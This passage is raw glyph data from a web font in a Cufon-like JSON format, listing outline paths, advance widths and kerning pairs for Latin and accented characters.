18,0r0,-115r-21,0r-5,-25v34,0,55,-2,68,-2v13,-1,15,5,14,16xm161,-228v-3,17,-11,36,-37,36v-19,0,-40,-21,-51,0r-18,0v4,-44,44,-38,72,-25v8,0,13,-6,15,-11r19,0","w":217},{"d":"180,0v-26,-1,-59,6,-68,-13v-27,27,-100,26,-100,-35v0,-38,37,-59,90,-60v3,-44,-39,-35,-75,-21r0,-30v53,-19,130,-20,130,51r0,73v-1,12,12,10,23,10r0,25xm102,-39r0,-44v-24,1,-38,14,-38,30v0,21,27,25,38,14xm136,-208v0,10,-9,17,-19,17v-10,0,-18,-7,-18,-17v0,-10,8,-18,18,-18v10,0,19,8,19,18xm80,-208v0,10,-8,17,-18,17v-10,0,-18,-7,-18,-17v0,-10,8,-18,18,-18v10,0,18,8,18,18","w":185},{"d":"118,-140r-33,11r0,94v0,11,9,10,19,10r0,25r-93,0r0,-25r19,0r0,-83r-33,12r0,-31r33,-12r0,-81r-22,0r-5,-26v34,0,56,-2,69,-2v10,0,13,3,13,11r0,77r33,-12r0,32","w":114},{"d":"56,-204r60,0r0,-16r-21,0r-5,-26v34,0,55,-2,68,-2v23,0,11,26,14,44r22,0r0,20r-22,0r0,148v-2,10,11,12,22,11r0,25v-25,-1,-55,5,-65,-12v-47,40,-122,3,-117,-72v5,-68,48,-98,104,-81r0,-19r-60,0r0,-20xm116,-35r0,-100v-27,-12,-47,-4,-47,52v0,53,22,64,47,48","w":200},{"d":"228,-193v-20,0,-26,0,-36,18r-46,90v4,23,-13,61,22,56r0,29r-102,0r0,-29r21,0r0,-55r-46,-92v-7,-16,-15,-18,-34,-17r0,-29r103,0r0,29r-15,0r31,63r32,-63r-14,0r0,-29r84,0r0,29xm170,-256v0,10,-9,18,-19,18v-10,0,-18,-8,-18,-18v0,-10,8,-18,18,-18v10,0,19,8,19,18xm114,-256v0,10,-9,18,-19,18v-10,0,-17,-8,-17,-18v0,-10,7,-18,17,-18v10,0,19,8,19,18","w":235,"k":{"Q":4,"q":19,"C":5,"\u0106":5,"\u00c7":5,"\u0108":5,"\u010c":5,"\u010a":5,"G":5,"\u011c":5,"\u011e":5,"\u0120":5,"\u0122":5,"O":4,"\u00d2":4,"\u00d3":4,"\u00d4":4,"\u00d5":4,"\u00d6":4,"\u014c":4,"\u014e":4,"\u0150":4,"\u00d8":4,"\u01fe":4,"\u0152":4,"e":22,"\u00e8":22,"\u00e9":22,"\u00ea":22,"\u011b":22,"\u00eb":22,"\u0113":22,"\u0115":22,"\u0117":22,"\u0119":22,"A":19,"\u00c0":19,"\u00c1":19,"\u00c2":19,"\u00c3":19,"\u00c4":19,"\u0100":19,"\u0102":19,"\u00c5":19,"\u01fa":19,"\u0104":19,"\u00c6":19,"\u01fc":19,"o":22,"\u00f2":22,"\u00f3":22,"\u00f4":22,"\u00f5":22,"\u00f6":22,"\u014d":22,"\u014f":22,"\u0151":22,"\u00f8":22,"\u01ff":22,"\u0153":22,"a":22,"\u00e0":22,"\u00e1":22,"\u00e2":22,"\u00e3":22,"\u00e4":22,"\u0101":22,"\u0103":22,"\u00e5":22,"\u01fb":22,"\u0105":22,"\u00e6":22,"\u01fd":22}},{"d":"210,-144v-12,-1,-28,4,-29,-8v-4,-13,0,-41,-16,-41r-24,0r0,149v-2,14,10,16,25,15r0,29r-106,0r0,-29r22,0r0,-164v-15,2,-34,-7,-36,10v-5,13,3,38,-14,39r-19,0r1,-78r194,0xm134,39v0,17,-8,33,-26,59r-13,-7v7,-12,14,-27,15,-37v-12,0,-19,-9,-19,-18v0,-12,9,-19,21,-19v12,0,22,8,22,22","w":222,"k":{"q":4,"A":14,"\u00c0":14,"\u00c1":14,"\u00c2":14,"\u00c3":14,"\u00c4":14,"\u0100":14,"\u0102":14,"\u00c5":14,"\u01fa":14,"\u0104":14,"\u00c6":14,"\u01fc":14,"e":6,"\u00e8":6,"\u00e9":6,"\u00ea":6,"\u011b":6,"\u00eb":6,"\u0113":6,"\u0115":6,"\u0117":6,"\u0119":6,"o":4,"\u00f2":4,"\u00f3":4,"\u00f4":4,"\u00f5":4,"\u00f6":4,"\u014d":4,"\u014f":4,"\u0151":4,"\u00f8":4,"\u01ff":4,"\u0153":4}},{"d":"198,0r-180,0r0,-29r21,0r0,-149v1,-13,-10,-16,-25,-15r0,-29r177,0r3,83v-13,0,-27,1,-28,-11v-5,-18,1,-43,-25,-43r-43,0r0,68r25,0v2,-16,5,-30,27,-25r0,77v-12,-1,-22,4,-24,-9r-3,-16r-25,0v4,23,-12,69,15,69r49,0v5,-16,8,-41,8,-58v14,0,28,-3,28,13r0,74xm132,-262v0,13,-10,22,-23,22v-13,0,-22,-9,-22,-22v0,-13,9,-22,22,-22v13,0,23,9,23,22","w":219},{"d":"251,-111v0,69,-52,115,-119,115v-67,0,-118,-46,-118,-115v0,-69,51,-115,118,-115v67,0,119,46,119,115xm217,-111v0,-54,-34,-91,-85,-91v-51,0,-85,37,-85,91v0,54,34,92,85,92v51,0,85,-38,85,-92xm85,-109v-4,-42,37,-73,70,-50v-1,-8,7,-6,14,-6r0,41v-24,5,-8,-25,-31,-24v-13,0,-23,10,-23,37v0,43,29,48,48,29r10,12v-27,32,-94,19,-88,-39","w":264},{"d":"131,-14v-40,35,-101,22,-101,-36r0,-90r-22,0r-5,-25v34,0,55,-2,68,-2v10,0,14,2,14,10r0,105v0,29,33,22,46,8r0,-96r-18,0r0,-25r91,0r5,25v-13,-1,-23,0,-23,14v-2,100,23,212,-87,207v-18,0,-38,-3,-50,-7r0,-35v34,12,87,16,82,-31r0,-22xm153,-184v-25,4,-34,-10,-46,-19v-13,9,-21,23,-47,19v16,-15,32,-58,64,-36","w":214},{"d":"192,-222v1,35,0,32,-25,69r-83,124v25,-4,70,11,73,-14r4,-17r29,0r0,60r-175,0v-1,-33,1,-33,21,-63r87,-130v-38,2,-82,-13,-80,36r-29,0r0,-65r178,0xm130,-262v0,13,-10,22,-23,22v-13,0,-22,-9,-22,-22v0,-13,9,-22,22,-22v13,0,23,9,23,22","w":206},{"d":"194,0v-25,-1,-55,5,-65,-12v-47,40,-122,3,-117,-72v5,-68,48,-98,104,-81r0,-55r-21,0r-5,-26v34,0,55,-2,68,-2v10,0,14,3,14,11r0,201v-2,10,11,12,22,11r0,25xm116,-35r0,-100v-27,-12,-47,-4,-47,52v0,53,22,64,47,48xm224,-226v0,17,-8,33,-26,59r-13,-6v7,-12,14,-28,15,-38v-12,0,-19,-8,-19,-17v0,-12,9,-20,21,-20v12,0,22,8,22,22","w":220},{"d":"142,-66v4,70,-70,81,-125,61r0,-36v21,13,66,17,66,-17r0,-122v1,-21,-35,-10,-54,-13r-8,-29r121,0r0,156","w":172,"k":{"o":4,"\u00f2":4,"\u00f3":4,"\u00f4":4,"\u00f5":4,"\u00f6":4,"\u014d":4,"\u014f":4,"\u0151":4,"\u00f8":4,"\u01ff":4,"\u0153":4}},{"d":"48,-226v63,0,6,111,12,163r-24,0v0,-31,-17,-112,-17,-131v0,-22,12,-32,29,-32xm71,-18v0,13,-10,22,-23,22v-13,0,-22,-9,-22,-22v0,-13,9,-23,22,-23v13,0,23,10,23,23","w":96},{"d":"12,-149r0,-23r27,0v3,-18,-6,-23,-25,-21r0,-29r104,0r0,29r-20,0r0,21r63,0v3,-18,-6,-23,-25,-21r0,-29r104,0r0,29r-20,0r0,21r25,0r0,23r-25,0r0,105v-2,14,10,16,25,15r0,29r-104,0r0,-29r20,0r0,-67r-63,0v5,26,-17,73,24,67r0,29r-104,0r0,-29r21,0r0,-120r-27,0xm98,-130r63,0r0,-19r-63,0r0,19","w":258},{"d":"69,-82v0,32,8,52,37,53v15,0,32,-7,40,-13r14,24v-12,11,-38,23,-64,23v-54,0,-84,-34,-84,-87v0,-75,71,-109,122,-74r2,-9r20,0r0,67v-18,2,-29,-1,-29,-20v0,-14,-12,-20,-24,-20v-28,2,-34,25,-34,56xm114,-206v0,13,-10,22,-23,22v-13,0,-22,-9,-22,-22v0,-13,9,-22,22,-22v13,0,23,9,23,22","w":174},{"d":"117,-215v89,23,103,219,-18,219v-47,0,-85,-27,-85,-84v-1,-61,52,-95,103,-75v-3,-11,-11,-22,-26,-31r-17,19r-15,-15r11,-12v-6,-1,-12,-3,-20,-3r9,-29v12,0,24,1,36,4r21,-24r15,15xm127,-88v0,-23,3,-41,-23,-41v-18,0,-31,15,-31,51v0,33,9,51,25,51v19,0,29,-17,29,-61","w":201},{"d":"185,25v0,28,-24,57,-90,57v-66,0,-113,-54,-59,-81v-18,-14,-15,-42,3,-58v-43,-47,-1,-131,76,-111v15,-23,32,-31,47,-31v18,0,17,14,17,30v-11,0,-24,0,-38,10v55,29,34,122,-44,122v-12,0,-24,-2,-33,-5v-6,15,1,17,27,17v52,0,94,7,94,50xm117,-103v0,-22,-5,-37,-20,-37v-15,0,-20,15,-20,37v0,22,5,36,20,36v15,0,20,-14,20,-36xm138,30v5,-23,-62,-10,-76,-16v-13,19,10,35,36,35v27,0,40,-10,40,-19xm143,-223v-2,20,-21,36,-47,36v-26,0,-43,-14,-46,-36r22,0v2,18,48,18,49,0r22,0","w":195},{"d":"113,-226v0,19,-9,42,-29,72r-14,-7v8,-14,15,-36,16,-47v-13,-1,-20,-11,-20,-21v0,-14,10,-23,23,-23v14,0,24,10,24,26xm57,-226v0,19,-9,42,-29,72r-14,-7v8,-14,16,-36,17,-47v-13,-1,-21,-11,-21,-21v0,-14,10,-23,23,-23v14,0,24,10,24,26","w":120},{"d":"233,0r-101,0r0,-29r17,0r-12,-38r-63,0r-11,31v0,9,12,7,21,7r0,29r-82,0r0,-29r21,0r75,-193r39,0r69,179v5,12,12,15,27,14r0,29xm128,-93r-21,-62r-23,62r44,0xm162,-247r-8,7v-21,-11,-44,-14,-67,-14v-1,-17,1,-30,17,-30v20,0,39,15,58,37","w":236,"k":{"v":17,"Q":3,"U":10,"V":33,"c":1,"w":17,"y":7,"u":7,"\u00f9":7,"\u00fa":7,"\u00fb":7,"\u0169":7,"\u00fc":7,"\u016b":7,"\u016d":7,"\u016f":7,"\u0171":7,"\u0173":7,"C":4,"\u0106":4,"\u00c7":4,"\u0108":4,"\u010c":4,"\u010a":4,"G":5,"\u011c":5,"\u011e":5,"\u0120":5,"\u0122":5,"O":3,"\u00d2":3,"\u00d3":3,"\u00d4":3,"\u00d5":3,"\u00d6":3,"\u014c":3,"\u014e":3,"\u0150":3,"\u00d8":3,"\u01fe":3,"\u0152":3,"T":22,"\u0164":22,"\u0162":22,"W":32,"\u0174":32,"Y":32,"\u00dd":32,"\u0176":32,"\u0178":32,"e":1,"\u00e8":1,"\u00e9":1,"\u00ea":1,"\u011b":1,"\u00eb":1,"\u0113":1,"\u0115":1,"\u0117":1,"\u0119":1}},{"d":"105,0r-93,0r0,-25r19,0r0,-195r-22,0r-5,-26v34,0,56,-2,69,-2v10,0,13,3,13,11r0,202v0,11,9,10,19,10r0,25xm141,-108v0,13,-10,22,-23,22v-13,0,-22,-9,-22,-22v0,-13,9,-22,22,-22v13,0,23,9,23,22","w":144},{"d":"124,0r-104,0r0,-29r20,0r0,-149v2,-14,-10,-16,-25,-15r0,-29r104,0r0,29r-20,0r0,149v-2,14,10,16,25,15r0,29xm113,-256v0,10,-8,18,-18,18v-10,0,-18,-8,-18,-18v0,-10,8,-18,18,-18v10,0,18,8,18,18xm58,-256v0,10,-9,18,-19,18v-10,0,-17,-8,-17,-18v0,-10,7,-18,17,-18v10,0,19,8,19,18","w":138},{"d":"79,-192v-23,0,-46,3,-67,14r-8,-7v19,-22,37,-37,57,-37v17,0,19,13,18,30","w":82},{"d":"14,-222v85,3,196,-20,195,66v0,25,-10,45,-38,58v21,23,21,71,66,69r0,29r-72,0r-47,-88r-20,0v4,25,-14,65,24,59r0,29r-104,0r0,-29r21,0r0,-149v1,-13,-10,-16,-25,-15r0,-29xm147,-154v0,-33,-16,-42,-49,-39r0,76v33,3,49,-9,49,-37xm154,39v0,17,-8,33,-26,59r-12,-7v7,-12,14,-27,15,-37v-12,0,-19,-9,-19,-18v0,-12,8,-19,20,-19v12,0,22,8,22,22","w":243},{"d":"168,-129r-146,0r0,-35r146,0r0,35xm168,-54r-146,0r0,-36r146,0r0,36","w":189},{"d":"138,-156v59,-39,135,10,122,83r-100,0v-2,50,50,53,80,29r14,24v-28,28,-103,36,-130,2v-24,31,-112,38,-112,-30v0,-38,36,-59,90,-60v3,-44,-39,-35,-75,-21r0,-30v35,-12,83,-18,111,3xm205,-98v3,-17,1,-41,-21,-41v-20,0,-25,26,-26,41r47,0xm109,-42v-5,-13,-7,-28,-7,-41v-34,-4,-51,50,-18,50v10,0,20,-4,25,-9","w":274},{"d":"271,-140v-18,-1,-27,1,-32,17r-35,123r-45,0r-24,-78r-26,78r-45,0r-45,-140r-19,0r0,-25r91,0r0,25v-13,-1,-20,3,-16,15r20,67r34,-107r23,0r34,107r22,-82r-19,0r0,-25r77,0xm186,-184v-25,4,-34,-10,-46,-19v-13,9,-21,23,-46,19v15,-15,31,-58,63,-36","w":264},{"d":"44,-114r38,0r0,-79v-15,2,-34,-7,-36,10v-5,13,3,38,-14,39r-19,0r1,-78r194,0r2,78v-12,-1,-28,4,-29,-8v-4,-13,0,-41,-16,-41r-24,0r0,79r38,0r0,22r-38,0v4,26,-16,70,25,63r0,29r-106,0r0,-29r22,0r0,-63r-38,0r0,-22","w":222,"k":{"q":4,"A":14,"\u00c0":14,"\u00c1":14,"\u00c2":14,"\u00c3":14,"\u00c4":14,"\u0100":14,"\u0102":14,"\u00c5":14,"\u01fa":14,"\u0104":14,"\u00c6":14,"\u01fc":14,"e":6,"\u00e8":6,"\u00e9":6,"\u00ea":6,"\u011b":6,"\u00eb":6,"\u0113":6,"\u0115":6,"\u0117":6,"\u0119":6,"o":4,"\u00f2":4,"\u00f3":4,"\u00f4":4,"\u00f5":4,"\u00f6":4,"\u014d":4,"\u014f":4,"\u0151":4,"\u00f8":4,"\u01ff":4,"\u0153":4}},{"d":"69,-82v0,32,8,52,37,53v15,0,32,-7,40,-13r14,24v-12,11,-38,23,-65,23r-3,9v21,-5,41,7,41,29v0,26,-39,44,-64,28r4,-19v10,7,34,8,32,-8v1,-11,-15,-16,-22,-8r-16,-6r9,-27v-41,-7,-64,-39,-64,-85v0,-75,71,-109,122,-74r2,-9r20,0r0,67v-18,2,-29,-1,-29,-20v0,-14,-12,-20,-24,-20v-28,2,-34,25,-34,56","w":174},{"d":"57,-76v0,41,61,61,70,23v5,-20,-39,-30,-56,-40v-82,-23,-58,-133,24,-133v21,0,38,6,48,15r1,-11r30,0r0,85v-47,10,-22,-56,-69,-51v-43,5,-28,36,8,51v33,14,75,28,75,74v0,59,-89,87,-131,50r-3,13r-30,0r0,-86v14,1,33,-5,33,10","w":202},{"d":"215,-111v0,77,-41,115,-99,115v-58,0,-100,-38,-100,-115v0,-77,42,-115,100,-115v58,0,99,38,99,115xm154,-111v0,-51,-15,-75,-38,-75v-23,0,-39,24,-39,75v0,51,16,75,39,75v23,0,38,-24,38,-75xm180,-269v-25,0,-39,8,-57,29r-7,-7v15,-35,32,-48,49,-48v17,-1,15,11,15,26xm116,-269v-25,0,-39,8,-57,29r-8,-7v15,-35,33,-48,50,-48v17,-1,15,11,15,26","w":231,"k":{"y":2,"u":2,"\u00f9":2,"\u00fa":2,"\u00fb":2,"\u0169":2,"\u00fc":2,"\u016b":2,"\u016d":2,"\u016f":2,"\u0171":2,"\u0173":2}},{"d":"159,-182v-44,-28,-81,17,-81,71v0,70,26,88,70,73v-2,-20,9,-47,-21,-41r0,-29r97,0r0,29r-17,0r0,79r-41,0r-5,-10v-65,33,-144,10,-144,-99v0,-91,94,-149,158,-97r3,-16r25,0r0,81v-19,2,-32,0,-32,-20v-2,-9,-5,-17,-12,-21xm145,39v0,17,-8,33,-26,59r-12,-7v7,-12,14,-27,15,-37v-12,0,-19,-9,-19,-18v0,-12,8,-19,20,-19v12,0,22,8,22,22","w":240,"k":{"v":6,"w":6,"y":4}},{"d":"236,-193r-20,0r0,193r-32,0r-105,-131r0,87v-2,14,10,16,25,15r0,29r-86,0r0,-29r21,0r0,-149v1,-13,-10,-16,-25,-15r0,-29r55,0r106,129r0,-85v2,-15,-10,-16,-25,-15r0,-29r86,0r0,29xm152,39v0,17,-9,33,-27,59r-12,-7v7,-12,14,-27,15,-37v-12,0,-19,-9,-19,-18v0,-12,9,-19,21,-19v12,0,22,8,22,22","w":253},{"d":"124,-170v95,1,88,175,-2,175v-16,0,-30,-5,-38,-13v-3,39,15,90,-33,88r-46,0r0,-26v10,0,23,2,23,-9r0,-265r-22,0r-5,-26v34,0,56,-2,69,-2v10,0,14,3,14,11r0,84v11,-11,25,-17,40,-17xm133,-82v0,-37,-10,-50,-27,-50v-30,0,-21,45,-22,75v0,18,8,27,22,27v17,0,27,-18,27,-52","w":203},{"d":"80,-222v106,-6,148,30,148,112v0,69,-36,110,-116,110r-94,0r0,-29r20,0r0,-69r-28,0r0,-28r28,0v-5,-27,17,-73,-25,-67r0,-29r67,0xm167,-111v0,-54,-14,-86,-70,-82r0,67r26,0r0,28r-26,0v5,27,-16,69,24,69v29,0,46,-20,46,-82","w":244},{"d":"150,-45v0,46,-75,66,-109,35r-3,10r-20,0r0,-66v15,0,29,-3,28,16v-1,25,48,35,53,11v3,-14,-30,-22,-43,-27v-23,-10,-40,-24,-40,-52v0,-48,73,-67,103,-38r2,-9r20,0r0,65v-17,1,-28,0,-27,-18v1,-26,-45,-29,-47,-7v-1,15,33,23,46,30v22,11,37,24,37,50xm110,41v0,17,-8,33,-26,59r-12,-6v7,-12,13,-28,14,-38v-12,0,-18,-8,-18,-17v0,-12,8,-20,20,-20v12,0,22,8,22,22","w":160},{"d":"14,-222v85,3,196,-20,195,66v0,25,-10,45,-38,58v21,23,21,71,66,69r0,29r-72,0r-47,-88r-20,0v4,25,-14,65,24,59r0,29r-104,0r0,-29r21,0r0,-149v1,-13,-10,-16,-25,-15r0,-29xm147,-154v0,-33,-16,-42,-49,-39r0,76v33,3,49,-9,49,-37xm164,-281v-16,16,-31,59,-64,37r-29,-37v26,-4,35,9,47,19v13,-9,21,-23,46,-19","w":243},{"d":"124,0r-104,0r0,-29r20,0r0,-149v2,-14,-10,-16,-25,-15r0,-29r104,0r8,29r-28,0r0,149v-2,14,10,16,25,15r0,29xm276,-66v4,70,-70,81,-125,61r0,-36v21,13,66,17,66,-17r0,-122v1,-21,-35,-10,-54,-13r-8,-29r121,0r0,156","w":306},{"d":"99,-208v0,10,-9,17,-19,17v-10,0,-17,-7,-17,-17v0,-10,7,-18,17,-18v10,0,19,8,19,18xm44,-208v0,10,-9,17,-19,17v-10,0,-18,-7,-18,-17v0,-10,8,-18,18,-18v10,0,19,8,19,18","w":106},{"d":"215,-111v0,77,-41,115,-99,115v-58,0,-100,-38,-100,-115v0,-77,42,-115,100,-115v58,0,99,38,99,115xm154,-111v0,-51,-15,-75,-38,-75v-23,0,-39,24,-39,75v0,51,16,75,39,75v23,0,38,-24,38,-75xm146,-254v-23,0,-47,3,-68,14r-7,-7v19,-22,37,-37,57,-37v16,0,20,13,18,30","w":231,"k":{"y":2,"u":2,"\u00f9":2,"\u00fa":2,"\u00fb":2,"\u0169":2,"\u00fc":2,"\u016b":2,"\u016d":2,"\u016f":2,"\u0171":2,"\u0173":2}},{"d":"94,-170v53,0,80,44,74,97r-100,0v-2,50,51,53,80,29r15,24v-15,14,-43,25,-70,25v-53,0,-83,-35,-83,-87v0,-50,33,-88,84,-88xm116,-98v0,-19,1,-41,-21,-41v-20,0,-25,26,-26,41r47,0xm136,-188r-8,8v-21,-11,-45,-14,-68,-14v-1,-17,1,-31,18,-31v20,0,39,15,58,37","w":182},{"d":"17,-111v0,-83,74,-145,141,-99r2,-12r26,0r0,82v-12,0,-28,3,-30,-9v-3,-20,-6,-39,-33,-40v-26,0,-45,21,-45,75v0,85,56,98,95,59r20,23v-15,18,-44,35,-77,36r-3,10v21,-5,41,7,41,29v0,26,-39,44,-64,28r5,-19v10,7,32,8,32,-8v0,-11,-16,-16,-23,-8r-15,-6r8,-27v-50,-7,-80,-48,-80,-114","w":209},{"d":"215,-111v0,77,-41,115,-99,115v-58,0,-100,-38,-100,-115v0,-77,42,-115,100,-115v58,0,99,38,99,115xm154,-111v0,-51,-15,-75,-38,-75v-23,0,-39,24,-39,75v0,51,16,75,39,75v23,0,38,-24,38,-75xm159,-247r-8,7v-21,-11,-44,-14,-67,-14v-1,-17,1,-30,17,-30v20,0,39,15,58,37","w":231,"k":{"y":2,"u":2,"\u00f9":2,"\u00fa":2,"\u00fb":2,"\u0169":2,"\u00fc":2,"\u016b":2,"\u016d":2,"\u016f":2,"\u0171":2,"\u0173":2}},{"d":"184,-195v-39,78,-64,141,-72,195r-57,0v10,-60,40,-117,79,-184r-70,0v-6,12,-3,32,-21,32r-18,0r6,-70r153,0r0,27"},{"d":"168,-91r-56,0r0,55r-35,0r0,-55r-55,0r0,-36r55,0r0,-55r35,0r0,55r56,0r0,36","w":189},{"d":"180,-82v1,69,-50,98,-111,83r-10,21r-26,0r14,-30v-21,-14,-34,-38,-34,-74v-1,-70,49,-99,111,-84r12,-27r26,0r-17,36v22,14,35,39,35,75xm107,-132v-26,-11,-37,10,-36,50v0,9,0,17,1,23xm85,-32v37,16,39,-38,36,-75","w":192},{"d":"310,0r-179,0r0,-29r20,0r0,-37r-69,0v-3,10,-26,33,-6,37r13,0r0,29r-89,0r0,-29r22,0r113,-193r169,0r3,83v-13,0,-27,1,-28,-11v-6,-17,0,-43,-25,-43r-44,0r0,68r25,0v3,-15,4,-30,27,-25r0,77v-11,-1,-20,4,-23,-9r-4,-16r-25,0v4,24,-13,69,17,69r47,0v5,-16,9,-41,9,-58v14,0,27,-3,27,13r0,74xm151,-93r0,-95r-53,95r53,0","w":331,"k":{"v":17,"Q":3,"U":10,"V":33,"c":1,"w":17,"y":7,"u":7,"\u00f9":7,"\u00fa":7,"\u00fb":7,"\u0169":7,"\u00fc":7,"\u016b":7,"\u016d":7,"\u016f":7,"\u0171":7,"\u0173":7,"C":4,"\u0106":4,"\u00c7":4,"\u0108":4,"\u010c":4,"\u010a":4,"G":5,"\u011c":5,"\u011e":5,"\u0120":5,"\u0122":5,"O":3,"\u00d2":3,"\u00d3":3,"\u00d4":3,"\u00d5":3,"\u00d6":3,"\u014c":3,"\u014e":3,"\u0150":3,"\u00d8":3,"\u01fe":3,"\u0152":3,"T":22,"\u0164":22,"\u0162":22,"W":32,"\u0174":32,"Y":32,"\u00dd":32,"\u0176":32,"\u0178":32,"e":1,"\u00e8":1,"\u00e9":1,"\u00ea":1,"\u011b":1,"\u00eb":1,"\u0113":1,"\u0115":1,"\u0117":1,"\u0119":1}},{"d":"197,-66r-55,0r-14,70r-29,0r14,-70r-39,0r-14,70r-29,0r14,-70r-36,0r0,-24r41,0r8,-42r-49,0r0,-25r54,0r14,-69r29,0r-14,69r39,0r14,-69r29,0r-14,69r37,0r0,25r-42,0r-8,42r50,0r0,24xm126,-132r-39,0r-8,42r39,0"},{"d":"57,-76v0,41,61,61,70,23v5,-20,-39,-30,-56,-40v-82,-23,-58,-133,24,-133v21,0,38,6,48,15r1,-11r30,0r0,85v-47,10,-22,-56,-69,-51v-43,5,-28,36,8,51v33,14,75,28,75,74v0,59,-89,87,-131,50r-3,13r-30,0r0,-86v14,1,33,-5,33,10xm143,-281v-15,16,-31,59,-63,37r-30,-37v26,-4,35,9,47,19v13,-9,21,-23,46,-19","w":202},{"d":"57,-76v0,41,61,61,70,23v5,-20,-39,-30,-56,-40v-82,-23,-58,-133,24,-133v21,0,38,6,48,15r1,-11r30,0r0,85v-47,10,-22,-56,-69,-51v-43,5,-28,36,8,51v33,14,75,28,75,74v0,37,-25,65,-76,67r-3,10v21,-5,41,7,41,29v0,26,-39,44,-64,28r4,-19v10,7,34,8,32,-8v1,-11,-15,-16,-22,-8r-16,-6r9,-27v-15,-3,-28,-9,-36,-16r-3,13r-30,0r0,-86v14,1,33,-5,33,10","w":202},{"d":"94,-170v53,0,80,44,74,97r-100,0v-2,50,51,53,80,29r15,24v-15,14,-43,25,-70,25v-53,0,-83,-35,-83,-87v0,-50,33,-88,84,-88xm116,-98v0,-19,1,-41,-21,-41v-20,0,-25,26,-26,41r47,0xm141,-184v-25,4,-34,-10,-46,-19v-13,9,-21,23,-47,19v15,-16,32,-58,64,-36","w":182},{"d":"194,-82v0,62,-56,110,-107,74v-3,39,15,90,-33,88r-46,0r0,-26v10,0,23,2,23,-9r0,-185r-22,0r-5,-25v34,0,56,-2,69,-2v13,-1,13,5,13,16v50,-42,108,-12,108,69xm136,-82v0,-54,-22,-60,-50,-39v3,33,-12,91,23,91v17,0,27,-18,27,-52"},{"d":"177,-18v-10,9,-28,18,-49,21r0,29r-21,0r0,-27v-50,-2,-79,-36,-79,-87v0,-57,35,-87,79,-88r0,-31r21,0r0,34v9,3,17,6,22,11v0,-11,11,-9,22,-9r0,67v-18,2,-28,-1,-28,-20v0,-11,-8,-17,-16,-19r0,108v14,-1,28,-8,35,-13xm107,-136v-28,12,-29,94,0,104r0,-104"},{"d":"57,-76v0,41,61,61,70,23v5,-20,-39,-30,-56,-40v-82,-23,-58,-133,24,-133v21,0,38,6,48,15r1,-11r30,0r0,85v-47,10,-22,-56,-69,-51v-43,5,-28,36,8,51v33,14,75,28,75,74v0,59,-89,87,-131,50r-3,13r-30,0r0,-86v14,1,33,-5,33,10xm147,-238v-26,4,-34,-10,-47,-19v-13,9,-21,23,-46,19v16,-16,31,-58,64,-36","w":202},{"d":"215,-111v0,77,-41,115,-99,115v-58,0,-100,-38,-100,-115v0,-77,42,-115,100,-115v58,0,99,38,99,115xm154,-111v0,-51,-15,-75,-38,-75v-23,0,-39,24,-39,75v0,51,16,75,39,75v23,0,38,-24,38,-75xm162,-273v-2,20,-20,36,-46,36v-26,0,-44,-14,-47,-36r22,0v2,18,48,18,49,0r22,0","w":231,"k":{"y":2,"u":2,"\u00f9":2,"\u00fa":2,"\u00fb":2,"\u0169":2,"\u00fc":2,"\u016b":2,"\u016d":2,"\u016f":2,"\u0171":2,"\u0173":2}},{"d":"192,-222v1,35,0,32,-25,69r-83,124v25,-4,70,11,73,-14r4,-17r29,0r0,60r-175,0v-1,-33,1,-33,21,-63r87,-130v-38,2,-82,-13,-80,36r-29,0r0,-65r178,0","w":206},{"d":"124,0r-104,0r0,-29r20,0r0,-149v2,-14,-10,-16,-25,-15r0,-29r104,0r0,29r-20,0r0,149v-2,14,10,16,25,15r0,29xm114,-238v-26,4,-35,-9,-47,-19v-13,9,-21,23,-46,19v16,-16,31,-58,64,-36","w":138},{"d":"14,-222v85,3,196,-20,195,66v0,25,-10,45,-38,58v21,23,21,71,66,69r0,29r-72,0r-47,-88r-20,0v4,25,-14,65,24,59r0,29r-104,0r0,-29r21,0r0,-149v1,-13,-10,-16,-25,-15r0,-29xm147,-154v0,-33,-16,-42,-49,-39r0,76v33,3,49,-9,49,-37xm148,-254v-23,0,-46,3,-67,14r-8,-7v19,-22,37,-37,57,-37v16,0,20,13,18,30","w":243},{"d":"153,32r-153,0r0,-23r153,0r0,23","w":153},{"d":"150,-45v0,46,-75,66,-109,35r-3,10r-20,0r0,-66v15,0,29,-3,28,16v-1,25,48,35,53,11v3,-14,-30,-22,-43,-27v-23,-10,-40,-24,-40,-52v0,-48,73,-67,103,-38r2,-9r20,0r0,65v-17,1,-28,0,-27,-18v1,-26,-45,-29,-47,-7v-1,15,33,23,46,30v22,11,37,24,37,50xm126,-226v-16,16,-31,58,-64,36r-29,-36v26,-4,34,10,47,19v13,-9,21,-23,46,-19","w":160},{"d":"143,-129v-23,0,-36,0,-56,12r0,82v0,12,10,10,20,10r0,25r-94,0r0,-25r19,0r0,-115r-22,0r-5,-25v34,0,56,-2,69,-2v13,0,14,7,13,19v10,-13,27,-22,44,-22v20,-1,9,25,12,41xm124,-226v-16,16,-31,58,-64,36r-29,-36v26,-4,35,9,47,19v13,-9,21,-23,46,-19","w":146},{"d":"17,-111v0,-83,74,-145,141,-99r2,-12r26,0r0,82v-12,0,-28,3,-30,-9v-3,-20,-6,-39,-33,-40v-26,0,-45,21,-45,75v0,85,56,98,95,59r20,23v-15,18,-44,36,-78,36v-60,0,-98,-42,-98,-115","w":209},{"d":"40,-226v40,0,10,59,10,95r-20,0v-3,-23,-11,-58,-11,-72v0,-17,8,-23,21,-23","w":79},{"d":"108,0r-93,0r0,-25r18,0r0,-115r-21,0r-5,-25v34,0,55,-2,68,-2v10,0,14,2,14,10r0,122v-1,12,9,10,19,10r0,25xm105,-223v-2,20,-21,36,-47,36v-26,0,-43,-14,-46,-36r22,0v2,18,48,18,49,0r22,0","w":118},{"d":"197,0r-179,0r0,-29r21,0r0,-149v1,-13,-10,-16,-25,-15r0,-29r104,0r0,29r-20,0r0,149v-1,28,41,10,63,15v5,-16,8,-41,8,-58v14,0,28,-3,28,13r0,74","w":212,"k":{"y":5,"w":6,"v":6,"V":28,"U":6,"u":5,"\u00f9":5,"\u00fa":5,"\u00fb":5,"\u0169":5,"\u00fc":5,"\u016b":5,"\u016d":5,"\u016f":5,"\u0171":5,"\u0173":5,"W":28,"\u0174":28,"Y":20,"\u00dd":20,"\u0176":20,"\u0178":20}},{"d":"159,-182v-44,-28,-81,17,-81,71v0,70,26,88,70,73v-2,-20,9,-47,-21,-41r0,-29r97,0r0,29r-17,0r0,79r-41,0r-5,-10v-65,33,-144,10,-144,-99v0,-91,94,-149,158,-97r3,-16r25,0r0,81v-19,2,-32,0,-32,-20v-2,-9,-5,-17,-12,-21","w":240,"k":{"v":6,"w":6,"y":4}},{"d":"14,-222v85,3,196,-20,195,66v0,25,-10,45,-38,58v21